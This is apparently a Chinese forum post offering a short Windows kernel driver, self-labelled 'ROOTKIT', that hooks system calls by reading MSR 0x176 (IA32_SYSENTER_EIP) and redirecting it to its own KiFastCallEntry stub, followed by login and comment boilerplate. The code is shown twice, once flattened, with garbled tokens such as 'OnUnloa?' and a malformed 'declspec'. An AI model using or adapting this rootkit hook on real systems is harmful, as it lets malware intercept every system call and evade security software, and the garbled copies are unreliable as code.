本文共计672个字,预计阅读时长2.5分钟。
include ULONG d_origKiFastCallEntry; // Original value of ntoskrnl!KiFastCallEntry VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) { DbgPrint("ROOTKIT: OnUnload called\n"); } declspec(naked) MyKiFastCallEntry() // Hook function { asm { jmp [d_origKiFastCallEntry] } } NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) { theDriverObject->DriverUnload = OnUnloa? __asm { mov ecx, 0x176 rdmsr // read the value of the IA32_SYSENTER_EIP register mov d_origKiFastCallEntry, eax mov eax, MyKiFastCallEntry // Hook function address wrmsr // Write to the IA32_SYSENTER_EIP register } return STATUS_SUCCESS; }
ULONG d_origKiFastCallEntry; // Original value of ntoskrnl!KiFastCallEntry
VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) { DbgPrint("ROOTKIT: OnUnload called\n"); }
declspec(naked) MyKiFastCallEntry() // Hook function { asm { jmp [d_origKiFastCallEntry] } }
NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) { theDriverObject->DriverUnload = OnUnloa? __asm { mov ecx, 0x176 rdmsr // read the value of the IA32_SYSENTER_EIP register mov d_origKiFastCallEntry, eax mov eax, MyKiFastCallEntry // Hook function address wrmsr // Write to the IA32_SYSENTER_EIP register } return STATUS_SUCCESS; }
暂无评论
您需要登录后才可以回帖
立即登录 立即注册
HOOK KiFastCallEntry代码
请登录您的账号,开始你的旅途
没有帐号?用户注册
